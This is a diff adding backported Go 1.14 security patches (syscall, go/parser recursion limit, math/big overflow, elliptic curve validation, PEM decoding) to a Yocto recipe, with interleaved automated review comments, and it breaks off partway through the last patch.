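Review bot: go.mod, go.sum and vendor/modules.txt are moved to golang.org/x/net a5309b321dca, but the only code change in this patch is the canonicalHeader cache cap in src/net/http/h2_bundle.go, and nothing under src/vendor/golang.org/x/net is touched. If other commits lie between 4acb7895a057 and a5309b321dca, the declared module version and the shipped sources would disagree, and scanners or SBOM tooling that read go.mod would credit this Go 1.14 tree with fixes it does not contain. It is worth confirming against the upstream branch that the cache cap is the only delta, or else keeping the module metadata at the old version and carrying just the h2_bundle.go change. canonicalHeader's body starts outside the hunk.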
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2021-44717.patch b/meta/recipes-devtools/go/go-1.14/CVE-2021-44717.patch
new file mode 100644
index 0000000000..17cac7a5ba
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2021-44717.patch
@@ -0,0 +1,83 @@
1From 9171c664e7af479aa26bc72f2e7cf4e69d8e0a6f Mon Sep 17 00:00:00 2001
2From: Hitendra Prajapati <hprajapati@mvista.com>
3Date: Fri, 17 Jun 2022 10:22:47 +0530
4Subject: [PATCH] CVE-2021-44717
5
6Upstream-Status: Backport [https://github.com/golang/go/commit/44a3fb49]
7CVE: CVE-2021-44717
8Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
9
10syscall: fix ForkLock spurious close(0) on pipe failure
11Pipe (and therefore forkLockPipe) does not make any guarantees
12about the state of p after a failed Pipe(p). Avoid that assumption
13and the too-clever goto, so that we don't accidentally Close a real fd
14if the failed pipe leaves p[0] or p[1] set >= 0.
15
16Updates #50057
17Fixes CVE-2021-44717
18
19Change-Id: Iff8e19a6efbba0c73cc8b13ecfae381c87600bb4
20Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1291270
21Reviewed-by: Ian Lance Taylor <iant@google.com>
22Reviewed-on: https://go-review.googlesource.com/c/go/+/370514
23Trust: Filippo Valsorda <filippo@golang.org>
24Run-TryBot: Filippo Valsorda <filippo@golang.org>
25TryBot-Result: Gopher Robot <gobot@golang.org>
26Reviewed-by: Alex Rakoczy <alex@golang.org>
27---
28 src/syscall/exec_unix.go | 20 ++++++--------------
29 1 file changed, 6 insertions(+), 14 deletions(-)
30
31diff --git a/src/syscall/exec_unix.go b/src/syscall/exec_unix.go
32index b3798b6..b73782c 100644
33--- a/src/syscall/exec_unix.go
34+++ b/src/syscall/exec_unix.go
35@@ -151,9 +151,6 @@ func forkExec(argv0 string, argv []string, attr *ProcAttr) (pid int, err error)
36 sys = &zeroSysProcAttr
37 }
38
39- p[0] = -1
40- p[1] = -1
41-
42 // Convert args to C form.
43 argv0p, err := BytePtrFromString(argv0)
44 if err != nil {
45@@ -194,14 +191,17 @@ func forkExec(argv0 string, argv []string, attr *ProcAttr) (pid int, err error)
46
47 // Allocate child status pipe close on exec.
48 if err = forkExecPipe(p[:]); err != nil {
49- goto error
50+ ForkLock.Unlock()
51+ return 0, err
52 }
53
54 // Kick off child.
55 pid, err1 = forkAndExecInChild(argv0p, argvp, envvp, chroot, dir, attr, sys, p[1])
56 if err1 != 0 {
57- err = Errno(err1)
58- goto error
59+ Close(p[0])
60+ Close(p[1])
61+ ForkLock.Unlock()
62+ return 0, Errno(err1)
63 }
64 ForkLock.Unlock()
65
66@@ -228,14 +228,6 @@ func forkExec(argv0 string, argv []string, attr *ProcAttr) (pid int, err error)
67
68 // Read got EOF, so pipe closed on exec, so exec succeeded.
69 return pid, nil
70-
71-error:
72- if p[0] >= 0 {
73- Close(p[0])
74- Close(p[1])
75- }
76- ForkLock.Unlock()
77- return 0, err
78 }
79
80 // Combination of fork and exec, careful to be thread safe.
81--
822.25.1
83
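Review bot: The early return after a failed forkExecPipe in forkExec deliberately leaves p untouched, but nothing in the new code says so, while the very next error branch does close both ends. A one-line comment such as `// p is unspecified after a failed forkExecPipe, so there is nothing safe to close here` would keep a later cleanup from reintroducing the stray Close. The patch header also replaces the upstream subject and author with the backporter's and cites an abbreviated hash (`44a3fb49`); quoting the full upstream commit id in `Upstream-Status` would make the provenance checkable. forkExec starts and ends outside the hunks shown.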
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-1962.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-1962.patch
new file mode 100644
index 0000000000..b2ab5d0669
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-1962.patch
@@ -0,0 +1,357 @@
1From ba8788ebcead55e99e631c6a1157ad7b35535d11 Mon Sep 17 00:00:00 2001
2From: Roland Shoemaker <bracewell@google.com>
3Date: Wed, 15 Jun 2022 10:43:05 -0700
4Subject: [PATCH] [release-branch.go1.17] go/parser: limit recursion depth
5
6Limit nested parsing to 100,000, which prevents stack exhaustion when
7parsing deeply nested statements, types, and expressions. Also limit
8the scope depth to 1,000 during object resolution.
9
10Thanks to Juho Nurminen of Mattermost for reporting this issue.
11
12Fixes #53707
13Updates #53616
14Fixes CVE-2022-1962
15
16Change-Id: I4d7b86c1d75d0bf3c7af1fdea91582aa74272c64
17Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1491025
18Reviewed-by: Russ Cox <rsc@google.com>
19Reviewed-by: Damien Neil <dneil@google.com>
20(cherry picked from commit 6a856f08d58e4b6705c0c337d461c540c1235c83)
21Reviewed-on: https://go-review.googlesource.com/c/go/+/417070
22Reviewed-by: Heschi Kreinick <heschi@google.com>
23TryBot-Result: Gopher Robot <gobot@golang.org>
24Run-TryBot: Michael Knyszek <mknyszek@google.com>
25
26Upstream-Status: Backport [https://github.com/golang/go/commit/ba8788ebcead55e99e631c6a1157ad7b35535d11]
27CVE: CVE-2022-1962
28Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
29---
30 src/go/parser/interface.go | 10 ++-
31 src/go/parser/parser.go | 48 ++++++++--
32 src/go/parser/parser_test.go | 169 +++++++++++++++++++++++++++++++++++
33 3 files changed, 220 insertions(+), 7 deletions(-)
34
35diff --git a/src/go/parser/interface.go b/src/go/parser/interface.go
36index 54f9d7b..537b327 100644
37--- a/src/go/parser/interface.go
38+++ b/src/go/parser/interface.go
39@@ -92,8 +92,11 @@ func ParseFile(fset *token.FileSet, filename string, src interface{}, mode Mode)
40 defer func() {
41 if e := recover(); e != nil {
42 // resume same panic if it's not a bailout
43- if _, ok := e.(bailout); !ok {
44+ bail, ok := e.(bailout)
45+ if !ok {
46 panic(e)
47+ } else if bail.msg != "" {
48+ p.errors.Add(p.file.Position(bail.pos), bail.msg)
49 }
50 }
51
52@@ -188,8 +191,11 @@ func ParseExprFrom(fset *token.FileSet, filename string, src interface{}, mode M
53 defer func() {
54 if e := recover(); e != nil {
55 // resume same panic if it's not a bailout
56- if _, ok := e.(bailout); !ok {
57+ bail, ok := e.(bailout)
58+ if !ok {
59 panic(e)
60+ } else if bail.msg != "" {
61+ p.errors.Add(p.file.Position(bail.pos), bail.msg)
62 }
63 }
64 p.errors.Sort()
65diff --git a/src/go/parser/parser.go b/src/go/parser/parser.go
66index 31a7398..586fe90 100644
67--- a/src/go/parser/parser.go
68+++ b/src/go/parser/parser.go
69@@ -64,6 +64,10 @@ type parser struct {
70 unresolved []*ast.Ident // unresolved identifiers
71 imports []*ast.ImportSpec // list of imports
72
73+ // nestLev is used to track and limit the recursion depth
74+ // during parsing.
75+ nestLev int
76+
77 // Label scopes
78 // (maintained by open/close LabelScope)
79 labelScope *ast.Scope // label scope for current function
80@@ -236,6 +240,24 @@ func un(p *parser) {
81 p.printTrace(")")
82 }
83
84+// maxNestLev is the deepest we're willing to recurse during parsing
85+const maxNestLev int = 1e5
86+
87+func incNestLev(p *parser) *parser {
88+ p.nestLev++
89+ if p.nestLev > maxNestLev {
90+ p.error(p.pos, "exceeded max nesting depth")
91+ panic(bailout{})
92+ }
93+ return p
94+}
95+
96+// decNestLev is used to track nesting depth during parsing to prevent stack exhaustion.
97+// It is used along with incNestLev in a similar fashion to how un and trace are used.
98+func decNestLev(p *parser) {
99+ p.nestLev--
100+}
101+
102 // Advance to the next token.
103 func (p *parser) next0() {
104 // Because of one-token look-ahead, print the previous token
105@@ -348,8 +370,12 @@ func (p *parser) next() {
106 }
107 }
108
109-// A bailout panic is raised to indicate early termination.
110-type bailout struct{}
111+// A bailout panic is raised to indicate early termination. pos and msg are
112+// only populated when bailing out of object resolution.
113+type bailout struct {
114+ pos token.Pos
115+ msg string
116+}
117
118 func (p *parser) error(pos token.Pos, msg string) {
119 epos := p.file.Position(pos)
120@@ -1030,6 +1056,8 @@ func (p *parser) parseChanType() *ast.ChanType {
121
122 // If the result is an identifier, it is not resolved.
123 func (p *parser) tryIdentOrType() ast.Expr {
124+ defer decNestLev(incNestLev(p))
125+
126 switch p.tok {
127 case token.IDENT:
128 return p.parseTypeName()
129@@ -1609,7 +1637,13 @@ func (p *parser) parseBinaryExpr(lhs bool, prec1 int) ast.Expr {
130 }
131
132 x := p.parseUnaryExpr(lhs)
133- for {
134+ // We track the nesting here rather than at the entry for the function,
135+ // since it can iteratively produce a nested output, and we want to
136+ // limit how deep a structure we generate.
137+ var n int
138+ defer func() { p.nestLev -= n }()
139+ for n = 1; ; n++ {
140+ incNestLev(p)
141 op, oprec := p.tokPrec()
142 if oprec < prec1 {
143 return x
144@@ -1628,7 +1662,7 @@ func (p *parser) parseBinaryExpr(lhs bool, prec1 int) ast.Expr {
145 // The result may be a type or even a raw type ([...]int). Callers must
146 // check the result (using checkExpr or checkExprOrType), depending on
147 // context.
148-func (p *parser) parseExpr(lhs bool) ast.Expr {
149+func (p *parser) parseExpr(lhs bool) ast.Expr {
150 if p.trace {
151 defer un(trace(p, "Expression"))
152 }
153@@ -1899,6 +1933,8 @@ func (p *parser) parseIfHeader() (init ast.Stmt, cond ast.Expr) {
154 }
155
156 func (p *parser) parseIfStmt() *ast.IfStmt {
157+ defer decNestLev(incNestLev(p))
158+
159 if p.trace {
160 defer un(trace(p, "IfStmt"))
161 }
162@@ -2214,6 +2250,8 @@ func (p *parser) parseForStmt() ast.Stmt {
163 }
164
165 func (p *parser) parseStmt() (s ast.Stmt) {
166+ defer decNestLev(incNestLev(p))
167+
168 if p.trace {
169 defer un(trace(p, "Statement"))
170 }
171diff --git a/src/go/parser/parser_test.go b/src/go/parser/parser_test.go
172index 25a374e..37a6a2b 100644
173--- a/src/go/parser/parser_test.go
174+++ b/src/go/parser/parser_test.go
175@@ -10,6 +10,7 @@ import (
176 "go/ast"
177 "go/token"
178 "os"
179+ "runtime"
180 "strings"
181 "testing"
182 )
183@@ -569,3 +570,171 @@ type x int // comment
184 t.Errorf("got %q, want %q", comment, "// comment")
185 }
186 }
187+
188+var parseDepthTests = []struct {
189+ name string
190+ format string
191+ // multipler is used when a single statement may result in more than one
192+ // change in the depth level, for instance "1+(..." produces a BinaryExpr
193+ // followed by a UnaryExpr, which increments the depth twice. The test
194+ // case comment explains which nodes are triggering the multiple depth
195+ // changes.
196+ parseMultiplier int
197+ // scope is true if we should also test the statement for the resolver scope
198+ // depth limit.
199+ scope bool
200+ // scopeMultiplier does the same as parseMultiplier, but for the scope
201+ // depths.
202+ scopeMultiplier int
203+}{
204+ // The format expands the part inside « » many times.
205+ // A second set of brackets nested inside the first stops the repetition,
206+ // so that for example «(«1»)» expands to (((...((((1))))...))).
207+ {name: "array", format: "package main; var x «[1]»int"},
208+ {name: "slice", format: "package main; var x «[]»int"},
209+ {name: "struct", format: "package main; var x «struct { X «int» }»", scope: true},
210+ {name: "pointer", format: "package main; var x «*»int"},
211+ {name: "func", format: "package main; var x «func()»int", scope: true},
212+ {name: "chan", format: "package main; var x «chan »int"},
213+ {name: "chan2", format: "package main; var x «<-chan »int"},
214+ {name: "interface", format: "package main; var x «interface { M() «int» }»", scope: true, scopeMultiplier: 2}, // Scopes: InterfaceType, FuncType
215+ {name: "map", format: "package main; var x «map[int]»int"},
216+ {name: "slicelit", format: "package main; var x = «[]any{«»}»", parseMultiplier: 2}, // Parser nodes: UnaryExpr, CompositeLit
217+ {name: "arraylit", format: "package main; var x = «[1]any{«nil»}»", parseMultiplier: 2}, // Parser nodes: UnaryExpr, CompositeLit
218+ {name: "structlit", format: "package main; var x = «struct{x any}{«nil»}»", parseMultiplier: 2}, // Parser nodes: UnaryExpr, CompositeLit
219+ {name: "maplit", format: "package main; var x = «map[int]any{1:«nil»}»", parseMultiplier: 2}, // Parser nodes: CompositeLit, KeyValueExpr
220+ {name: "dot", format: "package main; var x = «x.»x"},
221+ {name: "index", format: "package main; var x = x«[1]»"},
222+ {name: "slice", format: "package main; var x = x«[1:2]»"},
223+ {name: "slice3", format: "package main; var x = x«[1:2:3]»"},
224+ {name: "dottype", format: "package main; var x = x«.(any)»"},
225+ {name: "callseq", format: "package main; var x = x«()»"},
226+ {name: "methseq", format: "package main; var x = x«.m()»", parseMultiplier: 2}, // Parser nodes: SelectorExpr, CallExpr
227+ {name: "binary", format: "package main; var x = «1+»1"},
228+ {name: "binaryparen", format: "package main; var x = «1+(«1»)»", parseMultiplier: 2}, // Parser nodes: BinaryExpr, ParenExpr
229+ {name: "unary", format: "package main; var x = «^»1"},
230+ {name: "addr", format: "package main; var x = «& »x"},
231+ {name: "star", format: "package main; var x = «*»x"},
232+ {name: "recv", format: "package main; var x = «<-»x"},
233+ {name: "call", format: "package main; var x = «f(«1»)»", parseMultiplier: 2}, // Parser nodes: Ident, CallExpr
234+ {name: "conv", format: "package main; var x = «(*T)(«1»)»", parseMultiplier: 2}, // Parser nodes: ParenExpr, CallExpr
235+ {name: "label", format: "package main; func main() { «Label:» }"},
236+ {name: "if", format: "package main; func main() { «if true { «» }»}", parseMultiplier: 2, scope: true, scopeMultiplier: 2}, // Parser nodes: IfStmt, BlockStmt. Scopes: IfStmt, BlockStmt
237+ {name: "ifelse", format: "package main; func main() { «if true {} else » {} }", scope: true},
238+ {name: "switch", format: "package main; func main() { «switch { default: «» }»}", scope: true, scopeMultiplier: 2}, // Scopes: TypeSwitchStmt, CaseClause
239+ {name: "typeswitch", format: "package main; func main() { «switch x.(type) { default: «» }» }", scope: true, scopeMultiplier: 2}, // Scopes: TypeSwitchStmt, CaseClause
240+ {name: "for0", format: "package main; func main() { «for { «» }» }", scope: true, scopeMultiplier: 2}, // Scopes: ForStmt, BlockStmt
241+ {name: "for1", format: "package main; func main() { «for x { «» }» }", scope: true, scopeMultiplier: 2}, // Scopes: ForStmt, BlockStmt
242+ {name: "for3", format: "package main; func main() { «for f(); g(); h() { «» }» }", scope: true, scopeMultiplier: 2}, // Scopes: ForStmt, BlockStmt
243+ {name: "forrange0", format: "package main; func main() { «for range x { «» }» }", scope: true, scopeMultiplier: 2}, // Scopes: RangeStmt, BlockStmt
244+ {name: "forrange1", format: "package main; func main() { «for x = range z { «» }» }", scope: true, scopeMultiplier: 2}, // Scopes: RangeStmt, BlockStmt
245+ {name: "forrange2", format: "package main; func main() { «for x, y = range z { «» }» }", scope: true, scopeMultiplier: 2}, // Scopes: RangeStmt, BlockStmt
246+ {name: "go", format: "package main; func main() { «go func() { «» }()» }", parseMultiplier: 2, scope: true}, // Parser nodes: GoStmt, FuncLit
247+ {name: "defer", format: "package main; func main() { «defer func() { «» }()» }", parseMultiplier: 2, scope: true}, // Parser nodes: DeferStmt, FuncLit
248+ {name: "select", format: "package main; func main() { «select { default: «» }» }", scope: true},
249+}
250+
251+// split splits pre«mid»post into pre, mid, post.
252+// If the string does not have that form, split returns x, "", "".
253+func split(x string) (pre, mid, post string) {
254+ start, end := strings.Index(x, "«"), strings.LastIndex(x, "»")
255+ if start < 0 || end < 0 {
256+ return x, "", ""
257+ }
258+ return x[:start], x[start+len("«") : end], x[end+len("»"):]
259+}
260+
261+func TestParseDepthLimit(t *testing.T) {
262+ if runtime.GOARCH == "wasm" {
263+ t.Skip("causes call stack exhaustion on js/wasm")
264+ }
265+ for _, tt := range parseDepthTests {
266+ for _, size := range []string{"small", "big"} {
267+ t.Run(tt.name+"/"+size, func(t *testing.T) {
268+ n := maxNestLev + 1
269+ if tt.parseMultiplier > 0 {
270+ n /= tt.parseMultiplier
271+ }
272+ if size == "small" {
273+ // Decrease the number of statements by 10, in order to check
274+ // that we do not fail when under the limit. 10 is used to
275+ // provide some wiggle room for cases where the surrounding
276+ // scaffolding syntax adds some noise to the depth that changes
277+ // on a per testcase basis.
278+ n -= 10
279+ }
280+
281+ pre, mid, post := split(tt.format)
282+ if strings.Contains(mid, "«") {
283+ left, base, right := split(mid)
284+ mid = strings.Repeat(left, n) + base + strings.Repeat(right, n)
285+ } else {
286+ mid = strings.Repeat(mid, n)
287+ }
288+ input := pre + mid + post
289+
290+ fset := token.NewFileSet()
291+ _, err := ParseFile(fset, "", input, ParseComments|SkipObjectResolution)
292+ if size == "small" {
293+ if err != nil {
294+ t.Errorf("ParseFile(...): %v (want success)", err)
295+ }
296+ } else {
297+ expected := "exceeded max nesting depth"
298+ if err == nil || !strings.HasSuffix(err.Error(), expected) {
299+ t.Errorf("ParseFile(...) = _, %v, want %q", err, expected)
300+ }
301+ }
302+ })
303+ }
304+ }
305+}
306+
307+func TestScopeDepthLimit(t *testing.T) {
308+ if runtime.GOARCH == "wasm" {
309+ t.Skip("causes call stack exhaustion on js/wasm")
310+ }
311+ for _, tt := range parseDepthTests {
312+ if !tt.scope {
313+ continue
314+ }
315+ for _, size := range []string{"small", "big"} {
316+ t.Run(tt.name+"/"+size, func(t *testing.T) {
317+ n := maxScopeDepth + 1
318+ if tt.scopeMultiplier > 0 {
319+ n /= tt.scopeMultiplier
320+ }
321+ if size == "small" {
322+ // Decrease the number of statements by 10, in order to check
323+ // that we do not fail when under the limit. 10 is used to
324+ // provide some wiggle room for cases where the surrounding
325+ // scaffolding syntax adds some noise to the depth that changes
326+ // on a per testcase basis.
327+ n -= 10
328+ }
329+
330+ pre, mid, post := split(tt.format)
331+ if strings.Contains(mid, "«") {
332+ left, base, right := split(mid)
333+ mid = strings.Repeat(left, n) + base + strings.Repeat(right, n)
334+ } else {
335+ mid = strings.Repeat(mid, n)
336+ }
337+ input := pre + mid + post
338+
339+ fset := token.NewFileSet()
340+ _, err := ParseFile(fset, "", input, DeclarationErrors)
341+ if size == "small" {
342+ if err != nil {
343+ t.Errorf("ParseFile(...): %v (want success)", err)
344+ }
345+ } else {
346+ expected := "exceeded max scope depth during object resolution"
347+ if err == nil || !strings.HasSuffix(err.Error(), expected) {
348+ t.Errorf("ParseFile(...) = _, %v, want %q", err, expected)
349+ }
350+ }
351+ })
352+ }
353+ }
354+}
355--
3562.30.2
357
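Review bot: None of the parser.go hunks guards parseUnaryExpr, and parseBinaryExpr calls `p.parseUnaryExpr(lhs)` before its first incNestLev, so recursion through nested unary or parenthesised operands appears to stay uncounted in this backport. Adding `defer decNestLev(incNestLev(p))` at the top of parseUnaryExpr, as the patch does for tryIdentOrType, parseIfStmt and parseStmt, would close that path. The new tests would normally catch this, but parser_test.go references `maxScopeDepth` and `SkipObjectResolution`, neither of which is defined by any hunk here (the 1,000 scope-depth limit in the commit message has no matching code change), so unless the 1.14 tree already provides them the test file will not compile. I would either backport the scope-depth limit as well or drop TestScopeDepthLimit and the SkipObjectResolution flag, then run the `unary`, `binaryparen` and `star` cases to confirm the limit fires. The functions touched all continue outside their hunks.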
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-23772.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-23772.patch
new file mode 100644
index 0000000000..f0daee3624
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-23772.patch
@@ -0,0 +1,50 @@
1From 70882eedccac803ddcf1c3215e0ae8fd59847e39 Mon Sep 17 00:00:00 2001
2From: Katie Hockman <katie@golang.org>
3Date: Sat, 26 Feb 2022 20:03:38 +0000
4Subject: [PATCH] [release-branch.go1.16] math/big: prevent overflow in
5 (*Rat).SetString
6
7Credit to rsc@ for the original patch.
8
9Thanks to the OSS-Fuzz project for discovering this
10issue and to Emmanuel Odeke (@odeke_et) for reporting it.
11
12Updates #50699
13Fixes #50700
14Fixes CVE-2022-23772
15---
16 src/math/big/ratconv.go | 5 +++++
17 src/math/big/ratconv_test.go | 1 +
18 2 files changed, 6 insertions(+)
19
20diff --git a/src/math/big/ratconv.go b/src/math/big/ratconv.go
21index 941139e..e8cbdbe 100644
22--- a/src/math/big/ratconv.go
23+++ b/src/math/big/ratconv.go
24@@ -168,6 +168,11 @@ func (z *Rat) SetString(s string) (*Rat, bool) {
25 n := exp5
26 if n < 0 {
27 n = -n
28+ if n < 0 {
29+ // This can occur if -n overflows. -(-1 << 63) would become
30+ // -1 << 63, which is still negative.
31+ return nil, false
32+ }
33 }
34 pow5 := z.b.abs.expNN(natFive, nat(nil).setWord(Word(n)), nil) // use underlying array of z.b.abs
35 if exp5 > 0 {
36diff --git a/src/math/big/ratconv_test.go b/src/math/big/ratconv_test.go
37index ba0d1ba..b820df4 100644
38--- a/src/math/big/ratconv_test.go
39+++ b/src/math/big/ratconv_test.go
40@@ -104,6 +104,7 @@ var setStringTests = []StringTest{
41 {in: "4/3/"},
42 {in: "4/3."},
43 {in: "4/"},
44+ {in: "13e-9223372036854775808"}, // CVE-2022-23772
45
46 // valid
47 {"0", "0", true},
48--
492.17.1
50
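Review bot: This patch header carries no `CVE:` or `Upstream-Status:` tag and no backporter `Signed-off-by:`, unlike sibling patches in this commit such as CVE-2021-41771.patch, CVE-2021-44717.patch and CVE-2022-1962.patch; CVE-2022-23806.patch further down likewise lacks `CVE:` and `Upstream-Status:`. Reviewers and tooling that rely on those tags to trace a fix to its upstream commit have only the file name to go on. I would add `CVE: CVE-2022-23772`, `Upstream-Status: Backport [<upstream commit URL>]` and `Signed-off-by: <backporter name and address>` above the `---` line, and the equivalent tags to the other patch. The guard itself (`if n < 0` after `n = -n`) sits inside SetString, whose body extends beyond the hunk.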
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-23806.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-23806.patch
new file mode 100644
index 0000000000..772acdcbf6
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-23806.patch
@@ -0,0 +1,142 @@
1From 5b376a209d1c61e10847e062d78c4b1aa90dff0c Mon Sep 17 00:00:00 2001
2From: Filippo Valsorda <filippo@golang.org>
3Date: Sat, 26 Feb 2022 10:40:57 +0000
4Subject: [PATCH] crypto/elliptic: make IsOnCurve return false for invalid
5
6 field elements
7
8Updates #50974
9Fixes #50977
10Fixes CVE-2022-23806
11
12Signed-off-by: Minjae Kim <flowergom@gmail.com>
13
14---
15 src/crypto/elliptic/elliptic.go | 6 +++
16 src/crypto/elliptic/elliptic_test.go | 81 ++++++++++++++++++++++++++++
17 src/crypto/elliptic/p224.go | 6 +++
18 3 files changed, 93 insertions(+)
19
20diff --git a/src/crypto/elliptic/elliptic.go b/src/crypto/elliptic/elliptic.go
21index e2f71cd..bd574a4 100644
22--- a/src/crypto/elliptic/elliptic.go
23+++ b/src/crypto/elliptic/elliptic.go
24@@ -53,6 +53,12 @@ func (curve *CurveParams) Params() *CurveParams {
25 }
26
27 func (curve *CurveParams) IsOnCurve(x, y *big.Int) bool {
28+
29+ if x.Sign() < 0 || x.Cmp(curve.P) >= 0 ||
30+ y.Sign() < 0 || y.Cmp(curve.P) >= 0 {
31+ return false
32+ }
33+
34 // y² = x³ - 3x + b
35 y2 := new(big.Int).Mul(y, y)
36 y2.Mod(y2, curve.P)
37diff --git a/src/crypto/elliptic/elliptic_test.go b/src/crypto/elliptic/elliptic_test.go
38index 09c5483..b13a620 100644
39--- a/src/crypto/elliptic/elliptic_test.go
40+++ b/src/crypto/elliptic/elliptic_test.go
41@@ -628,3 +628,84 @@ func TestUnmarshalToLargeCoordinates(t *testing.T) {
42 t.Errorf("Unmarshal accepts invalid Y coordinate")
43 }
44 }
45+
46+func testAllCurves(t *testing.T, f func(*testing.T, Curve)) {
47+ tests := []struct {
48+ name string
49+ curve Curve
50+ }{
51+ {"P256", P256()},
52+ {"P256/Params", P256().Params()},
53+ {"P224", P224()},
54+ {"P224/Params", P224().Params()},
55+ {"P384", P384()},
56+ {"P384/Params", P384().Params()},
57+ {"P521", P521()},
58+ {"P521/Params", P521().Params()},
59+ }
60+ if testing.Short() {
61+ tests = tests[:1]
62+ }
63+ for _, test := range tests {
64+ curve := test.curve
65+ t.Run(test.name, func(t *testing.T) {
66+ t.Parallel()
67+ f(t, curve)
68+ })
69+ }
70+}
71+
72+// TestInvalidCoordinates tests big.Int values that are not valid field elements
73+// (negative or bigger than P). They are expected to return false from
74+// IsOnCurve, all other behavior is undefined.
75+func TestInvalidCoordinates(t *testing.T) {
76+ testAllCurves(t, testInvalidCoordinates)
77+}
78+
79+func testInvalidCoordinates(t *testing.T, curve Curve) {
80+ checkIsOnCurveFalse := func(name string, x, y *big.Int) {
81+ if curve.IsOnCurve(x, y) {
82+ t.Errorf("IsOnCurve(%s) unexpectedly returned true", name)
83+ }
84+ }
85+
86+ p := curve.Params().P
87+ _, x, y, _ := GenerateKey(curve, rand.Reader)
88+ xx, yy := new(big.Int), new(big.Int)
89+
90+ // Check if the sign is getting dropped.
91+ xx.Neg(x)
92+ checkIsOnCurveFalse("-x, y", xx, y)
93+ yy.Neg(y)
94+ checkIsOnCurveFalse("x, -y", x, yy)
95+
96+ // Check if negative values are reduced modulo P.
97+ xx.Sub(x, p)
98+ checkIsOnCurveFalse("x-P, y", xx, y)
99+ yy.Sub(y, p)
100+ checkIsOnCurveFalse("x, y-P", x, yy)
101+
102+ // Check if positive values are reduced modulo P.
103+ xx.Add(x, p)
104+ checkIsOnCurveFalse("x+P, y", xx, y)
105+ yy.Add(y, p)
106+ checkIsOnCurveFalse("x, y+P", x, yy)
107+
108+ // Check if the overflow is dropped.
109+ xx.Add(x, new(big.Int).Lsh(big.NewInt(1), 535))
110+ checkIsOnCurveFalse("x+2⁵³⁵, y", xx, y)
111+ yy.Add(y, new(big.Int).Lsh(big.NewInt(1), 535))
112+ checkIsOnCurveFalse("x, y+2⁵³⁵", x, yy)
113+
114+ // Check if P is treated like zero (if possible).
115+ // y^2 = x^3 - 3x + B
116+ // y = mod_sqrt(x^3 - 3x + B)
117+ // y = mod_sqrt(B) if x = 0
118+ // If there is no modsqrt, there is no point with x = 0, can't test x = P.
119+ if yy := new(big.Int).ModSqrt(curve.Params().B, p); yy != nil {
120+ if !curve.IsOnCurve(big.NewInt(0), yy) {
121+ t.Fatal("(0, mod_sqrt(B)) is not on the curve?")
122+ }
123+ checkIsOnCurveFalse("P, y", p, yy)
124+ }
125+}
126diff --git a/src/crypto/elliptic/p224.go b/src/crypto/elliptic/p224.go
127index 8c76021..f1bfd7e 100644
128--- a/src/crypto/elliptic/p224.go
129+++ b/src/crypto/elliptic/p224.go
130@@ -48,6 +48,12 @@ func (curve p224Curve) Params() *CurveParams {
131 }
132
133 func (curve p224Curve) IsOnCurve(bigX, bigY *big.Int) bool {
134+
135+ if bigX.Sign() < 0 || bigX.Cmp(curve.P) >= 0 ||
136+ bigY.Sign() < 0 || bigY.Cmp(curve.P) >= 0 {
137+ return false
138+ }
139+
140 var x, y p224FieldElement
141 p224FromBig(&x, bigX)
142 p224FromBig(&y, bigY)
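Review bot: The range check added to both IsOnCurve implementations has no comment, although the one-line reason is the whole point of the fix. Something like `// Reject coordinates outside [0, P): they are not valid field elements.` above each `if` would document it. Note also that testAllCurves trims its table to the first entry under `testing.Short()`, so the p224Curve copy of the check in p224.go is only exercised in a full test run. Both IsOnCurve bodies continue past the end of their hunks.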
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-24675.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-24675.patch
new file mode 100644
index 0000000000..4bc012be21
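--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-24675.patch
@@ -0,0 +1,271 @@
+From 1eb931d60a24501a9668e5cb4647593e19115507 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Fri, 17 Jun 2022 12:22:53 +0530
+Subject: [PATCH] CVE-2022-24675
+
+Upstream-Status: Backport [https://go-review.googlesource.com/c/go/+/399816/]
+CVE: CVE-2022-24675
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ src/encoding/pem/pem.go | 174 +++++++++++++++--------------------
+ src/encoding/pem/pem_test.go | 28 +++++-
+ 2 files changed, 101 insertions(+), 101 deletions(-)
+
+diff --git a/src/encoding/pem/pem.go b/src/encoding/pem/pem.go
+index a7272da..1bee1c1 100644
+--- a/src/encoding/pem/pem.go
++++ b/src/encoding/pem/pem.go
+@@ -87,123 +87,97 @@ func Decode(data []byte) (p *Block, rest []byte) {
+ // pemStart begins with a newline. However, at the very beginning of
+ // the byte array, we'll accept the start string without it.
+ rest = data
+- if bytes.HasPrefix(data, pemStart[1:]) {
+- rest = rest[len(pemStart)-1 : len(data)]
+- } else if i := bytes.Index(data, pemStart); i >= 0 {
+- rest = rest[i+len(pemStart) : len(data)]
+- } else {
+- return nil, data
+- }
+-
+- typeLine, rest := getLine(rest)
+- if !bytes.HasSuffix(typeLine, pemEndOfLine) {
+- return decodeError(data, rest)
+- }
+- typeLine = typeLine[0 : len(typeLine)-len(pemEndOfLine)]
+-
+- p = &Block{
+- Headers: make(map[string]string),
+- Type: string(typeLine),
+- }
+-
+ for {
+- // This loop terminates because getLine's second result is
+- // always smaller than its argument.
+- if len(rest) == 0 {
++ if bytes.HasPrefix(rest, pemStart[1:]) {
++ rest = rest[len(pemStart)-1:]
++ } else if i := bytes.Index(rest, pemStart); i >= 0 {
++ rest = rest[i+len(pemStart) : len(rest)]
++ } else {
+ return nil, data
+ }
+- line, next := getLine(rest)
+
+- i := bytes.IndexByte(line, ':')
+- if i == -1 {
+- break
++ var typeLine []byte
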